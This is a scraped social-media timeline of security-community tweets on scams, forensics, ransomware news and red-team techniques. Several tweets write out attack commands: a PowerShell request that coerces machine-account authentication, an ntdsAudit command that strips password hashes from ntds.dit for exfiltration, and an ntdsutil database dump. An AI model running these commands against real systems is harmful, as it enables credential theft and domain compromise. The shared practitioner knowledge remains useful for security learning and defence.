Name cannot be blank

371 posts

Name cannot be blank banner
Name cannot be blank

Name cannot be blank

@thisaintechno

Bio

Beigetreten Mayıs 2013
89 Folgt31 Follower
Alex Banks
Alex Banks@thealexbanks·
I just fell for one of the best scams I've seen on X. Here's what you need to know (and how to avoid it):
Alex Banks tweet media
English
310
982
5K
1.4M
RetroTech Chris
RetroTech Chris@RetroTechChris·
It's probably been ten years since I last used the QEMU emulator. I thought to myself, "How hard could it be to get QEMU running with Windows for Workgroups 3.11 with good sound, networking, and video in 2025"? Oh, man... okay, let's talk about it in a 🧵 here.
RetroTech Chris tweet media
English
15
46
477
32.4K
Elorm Daniel
Elorm Daniel@elormkdaniel·
I recently conducted a forensic imaging of a mobile phone using the MVT tool, and the results were fascinating. 📱🔍 I successfully created an exact replica of the device. A complete digital clone of over 32GB of data. But what really stood out was the ability to recover ....
Elorm Daniel tweet mediaElorm Daniel tweet mediaElorm Daniel tweet mediaElorm Daniel tweet media
English
55
290
1.9K
167.2K
Mehdi
Mehdi@MehdiHacks·
🧵 How does an off-the-shelf car GPS jammer work? A short thread. There are many ways to perform radio signal jamming (and also detect or protect against it), however the most basic concept is this: a jammer saturates the input of the target's receiver system by noise, in a way that it can't receive/detect/decode the desired radio signal anymore. It reduces the signal to noise ratio. It's like if you want to listen to someone, but I shout at you in close proximity, so you can't hear that person. (I hope experts don't shout at me for this simplistic example) There are many legal and illegal use cases for a jammer: military, law enforcement, car theft, protection against tracking etc. 1/4
Mehdi tweet media
English
8
26
249
28.1K
Ash
Ash@_bin_Ash·
In the past year I've seen SO many weird permissions granted to the "Domain Computers" group in environments. Always check outbound control from this group! See below for how to gain "Domain Computers" permissions, for later exploitation (with many links from @_nwodtuhs):
English
4
17
39
3.9K
Mayfly
Mayfly@M4yFly·
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵
Mayfly tweet media
English
8
219
773
78.8K
Greg Linares (Laughing Mantis)
Greg Linares (Laughing Mantis)@Laughing_Mantis·
PSA In the last week I have seen 3 examples of a relatively new strategy targeting telcos & iPhones of victims With the increased measures against SIM Swapping, it seems attackers are switching over to 2 other methods to compromise phones - Call Forwarding - Parental Tools
English
6
55
181
63.8K
Matthew
Matthew@embee_research·
I've been playing around with Module Stomping for EDR Evasion This is a cool technique for bypassing detection by overwriting "legitimate" memory regions. Let's see what it looks like from a #Malware and RE Perspective @SEKTOR7net [1/25]
Matthew tweet mediaMatthew tweet mediaMatthew tweet mediaMatthew tweet media
English
4
126
321
50.8K
Ashley - Serious Security Scientist
Oh yay, more SANS hate. The more you try to devalue the cert, the more you are just hurting people who have them... like me... who the only reason I was able to be secure in infosec is with those certs. So, thanks I guess.
English
5
3
83
15.5K
Name cannot be blank retweetet
Tim McGuffin
Tim McGuffin@NotMedic·
That DIT is going to take forever to exfiltrate. Better to strip the hashes out and exfiltrate those instead. github.com/Dionach/NtdsAu… ntdsAudit.exe '.\Active Directory\ntds.dit' -s registry\SYSTEM -p pwddump.txt -u users.csv Its c#, so you can reflectively load it in PS, too.
Grzegorz Tworek@0gtweet

Did you spot something like: ntdsutil "activate instance ntds" "ifm" "create full c:\somerandompath" q q on your DC? You are in huge trouble... BTW it creates the folder you specify as path.

English
3
23
98
42.3K
Coro
Coro@coro_cyber·
@joetidy not to brag, but we could've stopped that from happening @RoyalMail
English
1
0
0
551
Joe Tidy BBC News
Joe Tidy BBC News@joetidy·
Royal Mail ‘cyber incident’ confirmed as ransomware. LockBit or whoever has hacked the company know the damage they are inflicting so I expect ransom to be in the millions. Will Royal Mail pay the hackers?
English
9
38
87
30.8K
Name cannot be blank retweetet
Steve Campbell
Steve Campbell@lpha3ch0·
If you run Kali in VirtualBox, you should prob be familiar with this command to fix clipboard sync: sudo pkill -fx "/usr/bin/VBoxClient --clipboard" && /usr/bin/VBoxClient --clipboard
English
2
10
56
4.6K
Name cannot be blank retweetet
🇷🇴 cristi
🇷🇴 cristi@CristiVlad25·
How to learn reverse engineering fast. A Practical approach. (thread)
English
47
345
1.2K
136.4K
Name cannot be blank retweetet
Marcin Kozlowski
Marcin Kozlowski@marcinboi·
With a decade of experience I can tell there are great companies to work for and not. The great ones, allow you to grow, make mistakes, learn from them, be yourself, with all your handicaps, defects and your mastery skills, they care about you on individual level/human level
English
1
2
19
6.1K
Nasreddine Bencherchali
Nasreddine Bencherchali@nas_bench·
Me seeing another C2 framework being leaked and abused.
GIF
English
2
1
12
0
Name cannot be blank retweetet
Stephan Berger
Stephan Berger@malmoeb·
"Tools such as PC Hunter (which grants access to system processes, kernel modes, and hooks), GMER (which detects and removes rootkits) and Revo Uninstaller (which can uninstall apps and programs) also terminate programs and antimalware solutions." 3/4 trendmicro.com/vinfo/us/secur…
English
1
4
13
0